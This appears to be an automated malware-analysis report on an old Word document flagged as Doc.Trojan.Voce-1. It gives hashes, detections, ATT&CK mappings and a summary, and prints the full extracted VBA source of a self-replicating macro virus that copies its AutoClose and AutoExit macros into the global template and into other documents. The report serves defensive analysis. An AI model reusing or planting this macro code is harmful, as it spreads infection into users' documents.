Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 f54d6569680023f9…

MALICIOUS

Office (OLE)

37.0 KB Created: 2000-03-27 13:58:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: f7983006a682cc3e4d1866ed5fe592d8 SHA-1: 94aa24ba9960ffd02ac7903c4fed2e97fad38731 SHA-256: f54d6569680023f95c75ea8e94890416e648b5bddd77c7195ecc4b70f4eb5e24
200 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing VBA macros. The AutoClose macro attempts to copy itself and the AutoExit macro to the global template, indicating an attempt to infect other documents. The AutoExit macro contains logic that would display a message box on July 28th. The presence of AutoClose and AutoExit macros suggests a macro-based infection vector, likely delivered via spearphishing.

Heuristics 4

  • ClamAV: Doc.Trojan.Voce-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Voce-1
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Auto_Close macro high OLE_VBA_AUTOCLOSE
    Auto_Close macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 2053 bytes
SHA-256: 2bb89821526ca8bb6cadd0ffd30320aebabe3c53f50fae92310c53cda96401dd
Detection
ClamAV: Doc.Trojan.Voce-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "AutoClose"

Public Sub MAIN()
    Infectar
End Sub

Private Sub Infectar()
Dim Infectado
Infectado = VerificaVitima(0)
If Infectado = 0 Then
    WordBasic.MacroCopy WordBasic.[WindowName$]() + ":AutoClose", "Global:AutoClose"
    WordBasic.MacroCopy WordBasic.[WindowName$]() + ":AutoExit", "Global:AutoExit"
Else
    Infectado = VerificaVitima(1)
    If Infectado = 0 Then
        WordBasic.FileSaveAs Format:=1
        WordBasic.MacroCopy "Global:AutoClose", WordBasic.[WindowName$]() + ":AutoClose"
        WordBasic.MacroCopy "Global:AutoExit", WordBasic.[WindowName$]() + ":AutoExit"
    End If
End If
End Sub

Private Function VerificaVitima(Contexto)
Dim QtdadeMacros
Dim Infectado
Dim MAP0997
Dim i
    QtdadeMacros = WordBasic.CountMacros(Contexto)
    Infectado = 0
    MAP0997 = 0
    If QtdadeMacros > 0 Then
        For i = 1 To QtdadeMacros
            If WordBasic.[MacroName$](i, Contexto) = "AutoClose" Or MAP0997 = 1 Then
                MAP0997 = 1
                If WordBasic.[MacroName$](i, Contexto) = "AutoExit" Then
                    Infectado = 1
                End If
            End If
        Next
    End If
    VerificaVitima = Infectado
End Function

Attribute VB_Name = "AutoExit"

Public Sub MAIN()
    Mensagem
End Sub

Private Sub Mensagem()
Dim Atraso
Dim fim
    If (WordBasic.Day(WordBasic.Now()) = 28 And WordBasic.Month(WordBasic.Now()) = 7) Then
        WordBasic.MsgBox "Parabéns para mim! ", "Meu aniversário", -8
        Atraso = 3
    Else
        WordBasic.MsgBox "Fechando 2807M! ", "Nova Vítima", -8
        Atraso = 1
    End If
    fim = WordBasic.Second(WordBasic.Now()) + 1
    While WordBasic.Second(WordBasic.Now()) <> fim
    Wend
End Sub